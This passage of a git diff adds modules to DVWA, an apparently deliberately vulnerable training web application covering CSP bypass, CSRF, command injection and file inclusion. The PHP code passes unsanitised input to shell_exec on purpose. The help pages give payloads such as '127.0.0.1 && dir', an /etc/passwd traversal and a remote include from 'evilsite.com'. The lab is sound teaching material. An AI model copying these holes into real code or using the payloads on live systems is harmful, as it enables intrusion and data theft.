200, + "user" => $user["name"], + "level" => $user['level'] + ); + } else { + $ret = array ( + "status" => 525, + "message" => "User not found" + ); + } + } else { + $ret = array ( + "status" => 527, + "message" => "No user specified" + ); + } + } catch (Exception $exp) { + $ret = array ( + "status" => 526, + "message" => "Unable to decrypt token", + "extra" => $exp->getMessage() + ); + } + } + return json_encode ($ret); +} diff --git a/DVWA/vulnerabilities/cryptography/source/xor_theory.php b/DVWA/vulnerabilities/cryptography/source/xor_theory.php new file mode 100644 index 00000000..ad04c2ad --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/xor_theory.php @@ -0,0 +1,36 @@ +'; // For debugging + } + } + return $outText; +} + +$clear = "hello world, what a great day"; +$key = "wachtwoord"; + +print "Clear text\n" . $clear . "\n"; +print "\n"; + +$encoded = (xor_this($clear, $key)); +$b64_encoded = base64_encode ($encoded); +print "Encoded text\n"; +var_dump ($b64_encoded); +print "\n"; + +$b64_decoded = base64_decode ($b64_encoded); +$decoded = xor_this($b64_decoded, $key); +print "Decoded text\n"; +var_dump ($decoded); +print "\n"; + +?> diff --git a/DVWA/vulnerabilities/csp/help/help.php b/DVWA/vulnerabilities/csp/help/help.php new file mode 100644 index 00000000..b6342196 --- /dev/null +++ b/DVWA/vulnerabilities/csp/help/help.php @@ -0,0 +1,58 @@ +
    +

    Help - Content Security Policy (CSP) Bypass

    + +
    + + + + +
    +

    About

    +

    Content Security Policy (CSP) is used to define where scripts and other resources can be loaded or executed from. This module will walk you through ways to bypass the policy based on common mistakes made by developers.

    +

    None of the vulnerabilities are actual vulnerabilities in CSP, they are vulnerabilities in the way it has been implemented.

    + +

    + +

    Objective

    +

    Bypass Content Security Policy (CSP) and execute JavaScript in the page.

    + +

    + +

    Low Level

    +

    Examine the policy to find all the sources that can be used to host external script files.

    +

    This exercise was originally written to work with Pastebin, then updated for Hastebin, then Toptal, but all these stopped working as they set various headers that prevent the browser executing the JavaScript once it has downloaded it. To get around this, there are a selection of links included in the exercise, some will work, some will not, try to work out why. + 

    Spoiler: 
+alert.js - Will work, this is a normal JavaScript file served with the correct headers.
+alert.txt - This will not work as it has the wrong content type set by the web server due to its file extension.
+cookie.js - This will work and will show your cookies
+forced_download.js - As the name says, the server sets the "Content-Disposition: attachment" header for this to force the browser to download it rather than execute it.
+wrong_content_type.js - This will not work as the web server ignores the file extension and forces the content type to get set as "plain/text" which prevents the browser executing it.
    + +
    + +

    Medium Level

    +

    The CSP policy tries to use a nonce to prevent inline scripts from being added by attackers.

    + 
    Spoiler: Examine the nonce and see how it varies (or doesn't).
    + +
    + +

    High Level

    +

    The page makes a JSONP call to source/jsonp.php passing the name of the function to callback to, you need to modify the jsonp.php script to change the callback function.

    + 
    Spoiler: The JavaScript on the page will execute whatever is returned by the page, changing this to your own code will execute that instead
    + +
    + +

    Impossible Level

    +

    + This level is an update of the high level where the JSONP call has its callback function hardcoded and the CSP policy is locked down to only allow external scripts. +

    +
    + +
    + +
    + +

    Reference:

    +

    Reference:

    +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/csp/index.php b/DVWA/vulnerabilities/csp/index.php new file mode 100644 index 00000000..bd99db15 --- /dev/null +++ b/DVWA/vulnerabilities/csp/index.php @@ -0,0 +1,57 @@ + +

    Vulnerability: Content Security Policy (CSP) Bypass

    + +
    +EOF; + +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/csp/source/{$vulnerabilityFile}"; + +$page[ 'body' ] .= << +EOF; + +$page[ 'body' ] .= " +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://content-security-policy.com/', "Content Security Policy Reference" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP', "Mozilla Developer Network - CSP: script-src") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/', "Mozilla Security Blog - CSP for the web we have" ) . "
      • +
    +

    Module developed by Digininja.

    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/csp/source/high.js b/DVWA/vulnerabilities/csp/source/high.js new file mode 100644 index 00000000..a4b10cfd --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/high.js @@ -0,0 +1,19 @@ +function clickButton() { + var s = document.createElement("script"); + s.src = "source/jsonp.php?callback=solveSum"; + document.body.appendChild(s); +} + +function solveSum(obj) { + if ("answer" in obj) { + document.getElementById("answer").innerHTML = obj['answer']; + } +} + +var solve_button = document.getElementById ("solve"); + +if (solve_button) { + solve_button.addEventListener("click", function() { + clickButton(); + }); +} diff --git a/DVWA/vulnerabilities/csp/source/high.php b/DVWA/vulnerabilities/csp/source/high.php new file mode 100644 index 00000000..18e1bf0f --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/high.php @@ -0,0 +1,22 @@ + + +

    The page makes a call to ' . DVWA_WEB_PAGE_TO_ROOT . '/vulnerabilities/csp/source/jsonp.php to load some code. Modify that page to run your own code.

    +

    1+2+3+4+5=

    + + + + +'; + diff --git a/DVWA/vulnerabilities/csp/source/impossible.js b/DVWA/vulnerabilities/csp/source/impossible.js new file mode 100644 index 00000000..11b56aa5 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/impossible.js @@ -0,0 +1,19 @@ +function clickButton() { + var s = document.createElement("script"); + s.src = "source/jsonp_impossible.php"; + document.body.appendChild(s); +} + +function solveSum(obj) { + if ("answer" in obj) { + document.getElementById("answer").innerHTML = obj['answer']; + } +} + +var solve_button = document.getElementById ("solve"); + +if (solve_button) { + solve_button.addEventListener("click", function() { + clickButton(); + }); +} diff --git a/DVWA/vulnerabilities/csp/source/impossible.php b/DVWA/vulnerabilities/csp/source/impossible.php new file mode 100644 index 00000000..320fd2f1 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/impossible.php @@ -0,0 +1,23 @@ + + +

    Unlike the high level, this does a JSONP call but does not use a callback, instead it hardcodes the function to call.

    The CSP settings only allow external JavaScript on the local server and no inline code.

    +

    1+2+3+4+5=

    + + + + +'; + diff --git a/DVWA/vulnerabilities/csp/source/jsonp.php b/DVWA/vulnerabilities/csp/source/jsonp.php new file mode 100644 index 00000000..fcfc5352 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/jsonp.php @@ -0,0 +1,13 @@ + "15"); + +echo $callback . "(".json_encode($outp).")"; +?> diff --git a/DVWA/vulnerabilities/csp/source/jsonp_impossible.php b/DVWA/vulnerabilities/csp/source/jsonp_impossible.php new file mode 100644 index 00000000..090a38b8 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/jsonp_impossible.php @@ -0,0 +1,7 @@ + "15"); + +echo "solveSum (".json_encode($outp).")"; +?> diff --git a/DVWA/vulnerabilities/csp/source/low.php b/DVWA/vulnerabilities/csp/source/low.php new file mode 100644 index 00000000..73fbc047 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/low.php @@ -0,0 +1,37 @@ + + +"; +} +$page[ 'body' ] .= ' +
    +

    You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:

    + + +
    +

    + As Pastebin and Hastebin have stopped working, here are some scripts that may, or may not help. +

    +
      +
    • https://digi.ninja/dvwa/alert.js
      • +
    • https://digi.ninja/dvwa/alert.txt
      • +
    • https://digi.ninja/dvwa/cookie.js
      • +
    • https://digi.ninja/dvwa/forced_download.js
      • +
    • https://digi.ninja/dvwa/wrong_content_type.js
      • +
    +

    + Pretend these are on a server like Pastebin and try to work out why some work and some do not work. Check the help for an explanation if you get stuck. +

    +'; diff --git a/DVWA/vulnerabilities/csp/source/medium.php b/DVWA/vulnerabilities/csp/source/medium.php new file mode 100644 index 00000000..0fd03209 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/medium.php @@ -0,0 +1,25 @@ +alert(1) + +?> + +

    Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.

    + + + +'; diff --git a/DVWA/vulnerabilities/csrf/help/help.php b/DVWA/vulnerabilities/csrf/help/help.php new file mode 100644 index 00000000..1c3d8b70 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/help/help.php @@ -0,0 +1,71 @@ +
    +

    Help - Cross Site Request Forgery (CSRF)

    + +
    + + + + +
    +

    About

    +

    CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. + With a little help of social engineering (such as sending a link via email/chat), an attacker may force the users of a web application to execute actions of + the attacker's choosing.

    + +

    A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is + the administrator account, this can compromise the entire web application.

    + +

    This attack may also be called "XSRF", similar to "Cross Site scripting (XSS)", and they are often used together.

    + +

    + +

    Objective

    +

    Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.

    + +

    + +

    Low Level

    +

    There are no measures in place to protect against this attack. This means a link can be crafted to achieve a certain action (in this case, change the current users password). + Then with some basic social engineering, have the target click the link (or just visit a certain page), to trigger the action.

    + 
    Spoiler: ?password_new=password&password_conf=password&Change=Change.
    + +
    + +

    Medium Level

    +

    For the medium level challenge, there is a check to see where the last requested page came from. The developer believes if it matches the current domain, + it must of come from the web application so it can be trusted.

    +

    It may be required to link in multiple vulnerabilities to exploit this vector, such as reflective XSS.

    + +
    + +

    High Level

    +

    In the high level, the developer has added an "anti Cross-Site Request Forgery (CSRF) token". In order by bypass this protection method, another vulnerability will be required.

    + 
    Spoiler: e.g. Javascript is a executed on the client side, in the browser.
    + +

    Bonus Challenge

    +

    At this level, the site will also accept a change password request as a JSON object in the following format:

    + 
    {"password_new":"a","password_conf":"a","Change":1}
    +

    When done this way, the CSRF token must be passed as a header named user-token.

    + +

    Here is a sample request:

    + 
    POST /vulnerabilities/csrf/ HTTP/1.1
+Host: dvwa.test
+Content-Length: 51
+Content-Type: application/json
+Cookie: PHPSESSID=0hr9ikmo07thlcvjv3u3pkfeni; security=high
+user-token: 026d0caed93471b507ed460ebddbd096
+
+{"password_new":"a","password_conf":"a","Change":1}
    + +
    + +

    Impossible Level

    +

    At this level, the site requires the user to give their current password as well as the new password. As the attacker does not know this, the site is protected against CSRF style attacks.

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/csrf/index.php b/DVWA/vulnerabilities/csrf/index.php new file mode 100644 index 00000000..cef64c3d --- /dev/null +++ b/DVWA/vulnerabilities/csrf/index.php @@ -0,0 +1,96 @@ +Test Credentials

    + +"; + +$page[ 'body' ] .= " +
    +

    Vulnerability: Cross Site Request Forgery (CSRF)

    + +
    +

    Change your admin password:

    +
    +
    + ".$testCredentials ." +

    +
    "; + +if( $vulnerabilityFile == 'impossible.php' ) { + $page[ 'body' ] .= " + Current password:
    +
    "; +} + +$page[ 'body' ] .= " + New password:
    +
    + Confirm new password:
    +
    +
    + \n"; + +if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + +$page[ 'body' ] .= " +
    + {$html} +
    +

    Note: Browsers are starting to default to setting the SameSite cookie flag to Lax, and in doing so are killing off some types of CSRF attacks. When they have completed their mission, this lab will not work as originally expected.

    +

    Announcements:

    + +

    As an alternative to the normal attack of hosting the malicious URLs or code on a separate host, you could try using other vulnerabilities in this app to store them, the Stored XSS lab would be a good place to start.

    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/csrf' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/csrf-faq.html' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_request_forgery ' ) . "
      • +
    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/csrf/source/high.php b/DVWA/vulnerabilities/csrf/source/high.php new file mode 100644 index 00000000..a0c79138 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/source/high.php @@ -0,0 +1,69 @@ +$return_message)); + exit; + } else { + $html .= "
    " . $return_message . "
    "; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/csrf/source/impossible.php b/DVWA/vulnerabilities/csrf/source/impossible.php new file mode 100644 index 00000000..7baad861 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/source/impossible.php @@ -0,0 +1,50 @@ +prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $current_user = dvwaCurrentUser(); + $data->bindParam( ':user', $current_user, PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); + + // Do both new passwords match and does the current password match the user? + if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) { + // It does! + $pass_new = stripslashes( $pass_new ); + $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); + $pass_new = md5( $pass_new ); + + // Update database with new password + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $current_user = dvwaCurrentUser(); + $data->bindParam( ':user', $current_user, PDO::PARAM_STR ); + $data->execute(); + + // Feedback for the user + $html .= "
    Password Changed.
    "; + } + else { + // Issue with passwords matching + $html .= "
    Passwords did not match or current password incorrect.
    "; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/csrf/source/low.php b/DVWA/vulnerabilities/csrf/source/low.php new file mode 100644 index 00000000..2f41a4e1 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/source/low.php @@ -0,0 +1,30 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Feedback for the user + $html .= "
    Password Changed.
    "; + } + else { + // Issue with passwords matching + $html .= "
    Passwords did not match.
    "; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/csrf/source/medium.php b/DVWA/vulnerabilities/csrf/source/medium.php new file mode 100644 index 00000000..65089d4a --- /dev/null +++ b/DVWA/vulnerabilities/csrf/source/medium.php @@ -0,0 +1,37 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Feedback for the user + $html .= "
    Password Changed.
    "; + } + else { + // Issue with passwords matching + $html .= "
    Passwords did not match.
    "; + } + } + else { + // Didn't come from a trusted source + $html .= "
    That request didn't look correct.
    "; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/csrf/test_credentials.php b/DVWA/vulnerabilities/csrf/test_credentials.php new file mode 100644 index 00000000..e7274a79 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/test_credentials.php @@ -0,0 +1,54 @@ +'. mysqli_connect_error() . '.
    Try installing again.' ); + if( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful... + $login_state = "

    Valid password for '{$user}'

    "; + }else{ + // Login failed + $login_state = "

    Wrong password for '{$user}'

    "; + } + +} +$messagesHtml = messagesPopAllToHtml(); +$page = dvwaPageNewGrab(); + +$page[ 'title' ] .= "Test Credentials"; +$page[ 'body' ] .= " +
    +

    Test Credentials

    +

    Vulnerabilities/CSRF

    +
    +
    +
    + " . $login_state . " +

    +

    +

    +
    +
    + {$messagesHtml} +
    +
    \n"; + +dvwaSourceHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/exec/help/help.php b/DVWA/vulnerabilities/exec/help/help.php new file mode 100644 index 00000000..d28c7ef0 --- /dev/null +++ b/DVWA/vulnerabilities/exec/help/help.php @@ -0,0 +1,62 @@ +
    +

    Help - Command Injection

    + +
    + + + + +
    +

    About

    +

    The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application. + In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it + as any authorized system user. However, commands are executed with the same privileges and environment as the web service has.

    + +

    Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker + (forms, cookies, HTTP headers etc.).

    + +

    The syntax and commands may differ between the Operating Systems (OS), such as Linux and Windows, depending on their desired actions.

    + +

    This attack may also be called "Remote Command Execution (RCE)".

    + +

    + +

    Objective

    +

    Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.

    + +

    + +

    Low Level

    +

    This allows for direct input into one of many PHP functions that will execute commands on the OS. It is possible to escape out of the designed command and + executed unintentional actions.

    +

    This can be done by adding on to the request, "once the command has executed successfully, run this command". + 

    Spoiler: To add a command "&&". Example: 127.0.0.1 && dir.
    + +
    + +

    Medium Level

    +

    The developer has read up on some of the issues with command injection, and placed in various pattern patching to filter the input. However, this isn't enough.

    +

    Various other system syntaxes can be used to break out of the desired command.

    + 
    Spoiler: e.g. background the ping command.
    + +
    + +

    High Level

    +

    In the high level, the developer goes back to the drawing board and puts in even more pattern to match. But even this isn't enough.

    +

    The developer has either made a slight typo with the filters and believes a certain PHP command will save them from this mistake.

    + 
    Spoiler: 
+			removes all leading & trailing spaces, right?.
    + +
    + +

    Impossible Level

    +

    In the impossible level, the challenge has been re-written, only to allow a very stricted input. If this doesn't match and doesn't produce a certain result, + it will not be allowed to execute. Rather than "black listing" filtering (allowing any input and removing unwanted), this uses "white listing" (only allow certain values).

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/exec/index.php b/DVWA/vulnerabilities/exec/index.php new file mode 100644 index 00000000..6a0de9ed --- /dev/null +++ b/DVWA/vulnerabilities/exec/index.php @@ -0,0 +1,67 @@ + +

    Vulnerability: Command Injection

    + +
    +

    Ping a device

    + +
    +

    + Enter an IP address: + + +

    \n"; + +if( $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + +$page[ 'body' ] .= " +
    + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'http://www.ss64.com/bash/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'http://www.ss64.com/nt/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Command_Injection' ) . "
      • +
    +\n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/exec/source/high.php b/DVWA/vulnerabilities/exec/source/high.php new file mode 100644 index 00000000..54c11369 --- /dev/null +++ b/DVWA/vulnerabilities/exec/source/high.php @@ -0,0 +1,37 @@ + '', + '&' => '', + ';' => '', + '| ' => '', + '-' => '', + '$' => '', + '(' => '', + ')' => '', + '`' => '', + ); + + // Remove any of the characters in the array (blacklist). + $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); + + // Determine OS and execute the ping command. + if( stristr( php_uname( 's' ), 'Windows NT' ) ) { + // Windows + $cmd = shell_exec( 'ping ' . $target ); + } + else { + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); + } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; +} + +?> diff --git a/DVWA/vulnerabilities/exec/source/impossible.php b/DVWA/vulnerabilities/exec/source/impossible.php new file mode 100644 index 00000000..aa495516 --- /dev/null +++ b/DVWA/vulnerabilities/exec/source/impossible.php @@ -0,0 +1,41 @@ +{$cmd}"; + } + else { + // Ops. Let the user name theres a mistake + $html .= '
    ERROR: You have entered an invalid IP.
    '; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/exec/source/low.php b/DVWA/vulnerabilities/exec/source/low.php new file mode 100644 index 00000000..e4a7f596 --- /dev/null +++ b/DVWA/vulnerabilities/exec/source/low.php @@ -0,0 +1,21 @@ +{$cmd}"; +} + +?> diff --git a/DVWA/vulnerabilities/exec/source/medium.php b/DVWA/vulnerabilities/exec/source/medium.php new file mode 100644 index 00000000..c7c1564b --- /dev/null +++ b/DVWA/vulnerabilities/exec/source/medium.php @@ -0,0 +1,30 @@ + '', + ';' => '', + ); + + // Remove any of the characters in the array (blacklist). + $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); + + // Determine OS and execute the ping command. + if( stristr( php_uname( 's' ), 'Windows NT' ) ) { + // Windows + $cmd = shell_exec( 'ping ' . $target ); + } + else { + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); + } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; +} + +?> diff --git a/DVWA/vulnerabilities/fi/file1.php b/DVWA/vulnerabilities/fi/file1.php new file mode 100644 index 00000000..04606976 --- /dev/null +++ b/DVWA/vulnerabilities/fi/file1.php @@ -0,0 +1,22 @@ + +

    Vulnerability: File Inclusion

    +
    +

    File 1

    +
    + Hello " . dvwaCurrentUser() . "
    + Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}

    + [back] +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . "
      • +
    +\n"; + +?> diff --git a/DVWA/vulnerabilities/fi/file2.php b/DVWA/vulnerabilities/fi/file2.php new file mode 100644 index 00000000..c6e26bec --- /dev/null +++ b/DVWA/vulnerabilities/fi/file2.php @@ -0,0 +1,20 @@ + +

    Vulnerability: File Inclusion

    +
    +

    File 2

    +
    + \"I needed a password eight characters long so I picked Snow White and the Seven Dwarves.\" ~ Nick Helm

    + [back]
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . "
      • +
    +\n"; + +?> diff --git a/DVWA/vulnerabilities/fi/file3.php b/DVWA/vulnerabilities/fi/file3.php new file mode 100644 index 00000000..c4997f6f --- /dev/null +++ b/DVWA/vulnerabilities/fi/file3.php @@ -0,0 +1,31 @@ + +

    Vulnerability: File Inclusion

    +
    +

    File 3

    +
    + Welcome back " . dvwaCurrentUser() . "
    + Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
    "; +if( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER )) { + $page[ 'body' ] .= "Forwarded for: " . $_SERVER[ 'HTTP_X_FORWARDED_FOR' ]; + $page[ 'body' ] .= "
    "; +} + $page[ 'body' ] .= "Your user-agent address is: {$_SERVER[ 'HTTP_USER_AGENT' ]}
    "; +if( array_key_exists( 'HTTP_REFERER', $_SERVER )) { + $page[ 'body' ] .= "You came from: {$_SERVER[ 'HTTP_REFERER' ]}
    "; +} + $page[ 'body' ] .= "I'm hosted at: {$_SERVER[ 'HTTP_HOST' ]}

    + [back] +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . "
      • +
    +\n"; + +?> diff --git a/DVWA/vulnerabilities/fi/file4.php b/DVWA/vulnerabilities/fi/file4.php new file mode 100644 index 00000000..9ccde4ba --- /dev/null +++ b/DVWA/vulnerabilities/fi/file4.php @@ -0,0 +1,14 @@ + +

    Vulnerability: File Inclusion

    +
    +

    File 4 (Hidden)

    +
    + Good job!
    + This file isn't listed at all on DVWA. If you are reading this, you did something right ;-)
    + +
    \n"; + +?> diff --git a/DVWA/vulnerabilities/fi/help/help.php b/DVWA/vulnerabilities/fi/help/help.php new file mode 100644 index 00000000..e9e71072 --- /dev/null +++ b/DVWA/vulnerabilities/fi/help/help.php @@ -0,0 +1,66 @@ +
    +

    Help - File Inclusion

    + +
    + + + + +
    +

    About

    +

    Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. + At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing + the potential for malicious file execution.

    + +

    If the file chosen to be included is local on the target machine, it is called "Local File Inclusion (LFI). But files may also be included on other + machines, which then the attack is a "Remote File Inclusion (RFI).

    + +

    When RFI is not an option. using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect.

    + +

    Note, the term "file inclusion" is not the same as "arbitrary file access" or "file disclosure".

    + +

    + +

    Objective

    +

    Read all five famous quotes from '../hackable/flags/fi.php' using only the file inclusion.

    + +

    + +

    Low Level

    +

    This allows for direct input into one of many PHP functions that will include the content when executing.

    + +

    Depending on the web service configuration will depend if RFI is a possibility.

    + 
    Spoiler: LFI: ?page=../../../../../../etc/passwd.
+			Spoiler: RFI: ?page=http://www.evilsite.com/evil.php.
    + +
    + +

    Medium Level

    +

    The developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used, isn't enough.

    + 
    Spoiler: LFI: Possible, due to it only cycling through the pattern matching once.
+			Spoiler: RFI: .
    + +
    + +

    High Level

    +

    The developer has had enough. They decided to only allow certain files to be used. However as there are multiple files with the same basename, + they use a wildcard to include them all.

    + 
    Spoiler: LFI: The filename only has start with a certain value..
+			Spoiler: RFI: Need to link in another vulnerability, such as file upload.
    + +
    + +

    Impossible Level

    +

    The developer calls it quits and hardcodes only the allowed pages, with there exact filenames. By doing this, it removes all avenues of attack.

    +
    + +
    + +
    + +

    Reference:

    +

    Reference:

    +

    Reference:

    +

    Reference:

    + +
    diff --git a/DVWA/vulnerabilities/fi/include.php b/DVWA/vulnerabilities/fi/include.php new file mode 100644 index 00000000..5e19b077 --- /dev/null +++ b/DVWA/vulnerabilities/fi/include.php @@ -0,0 +1,31 @@ +The PHP function allow_url_include is not enabled."; +} +if( !ini_get( 'allow_url_fopen' ) ) { + $WarningHtml .= "
    The PHP function allow_url_fopen is not enabled.
    "; +} + + +$page[ 'body' ] .= " +
    +

    Vulnerability: File Inclusion

    + + {$WarningHtml} + +
    + [file1.php] - [file2.php] - [file3.php] +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . "
      • +
    +
    \n"; + +?> diff --git a/DVWA/vulnerabilities/fi/index.php b/DVWA/vulnerabilities/fi/index.php new file mode 100644 index 00000000..6a912ea8 --- /dev/null +++ b/DVWA/vulnerabilities/fi/index.php @@ -0,0 +1,44 @@ + diff --git a/DVWA/vulnerabilities/fi/source/high.php b/DVWA/vulnerabilities/fi/source/high.php new file mode 100644 index 00000000..6dd2fb2b --- /dev/null +++ b/DVWA/vulnerabilities/fi/source/high.php @@ -0,0 +1,13 @@ + diff --git a/DVWA/vulnerabilities/fi/source/impossible.php b/DVWA/vulnerabilities/fi/source/impossible.php new file mode 100644 index 00000000..2c38116b --- /dev/null +++ b/DVWA/vulnerabilities/fi/source/impossible.php @@ -0,0 +1,20 @@ + diff --git a/DVWA/vulnerabilities/fi/source/low.php b/DVWA/vulnerabilities/fi/source/low.php new file mode 100644 index 00000000..36063868 --- /dev/null +++ b/DVWA/vulnerabilities/fi/source/low.php @@ -0,0 +1,6 @@ + diff --git a/DVWA/vulnerabilities/fi/source/medium.php b/DVWA/vulnerabilities/fi/source/medium.php new file mode 100644 index 00000000..766f4121 --- /dev/null +++ b/DVWA/vulnerabilities/fi/source/medium.php @@ -0,0 +1,10 @@ + diff --git a/DVWA/vulnerabilities/help.css b/DVWA/vulnerabilities/help.css new file mode 100644 index 00000000..d0ce9da0 --- /dev/null +++ b/DVWA/vulnerabilities/help.css @@ -0,0 